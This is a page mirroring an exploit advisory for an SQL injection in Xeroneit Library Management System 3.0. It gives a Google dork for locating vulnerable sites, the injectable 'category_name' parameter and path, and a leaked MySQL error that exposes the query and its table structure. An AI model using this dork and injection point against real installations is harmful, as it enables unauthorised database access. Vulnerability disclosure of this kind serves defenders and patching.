扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection # Google Dork: "LMS v3.0 - Xerone IT " # Date: 2020-04-09 # Exploit Author: Sohel Yousef jellyfish security team # Software Link: https://xeroneit.net/portfolio/library-management-system-lms # Software Demo :https://xeroneit.co/demo/lms/home/login # Version: v3.0 # Category: webapps 1. Description scritp has SQLI in books category at this dir /lms/home/book?category_name=00*SQLI Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' GROUP BY title</code>, <code>author</code>, <code>edition</code> ORDER BY <code>title</code> ASC LIMIT 21' at line 3 SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as available_book, <code>book_info</code>.<code>number_of_books</code>, <code>book_info</code>.<code>id</code>, book_info</code>.<code>category_id</code>, <code>book_info</code>.<code>title</code>, <code>book_info</code>.<code>size1</code> as size</code>, <code>book_info</code>.<code>publishing_year</code>, <code>book_info</code>.<code>publisher</code>, book_info</code>.<code>edition_year</code>, <code>book_info</code>.<code>subtitle</code>, <code>book_info</code>.<code>edition</code>, book_info</code>.<code>isbn</code>, <code>book_info</code>.<code>author</code>, <code>book_info</code>.<code>cover</code>, book_info</code>.<code>add_date</code> FROM <code>book_info</code> WHERE FIND_IN_SET('57'', category_id) !=0 AND <code>book_info</code>.<code>deleted</code> = '0' GROUP BY <code>title</code>, author</code>, <code>edition</code> ORDER BY <code>title</code> ASC LIMIT 21 Filename: models/Basic.php Line Number: 284 |
体验盒子
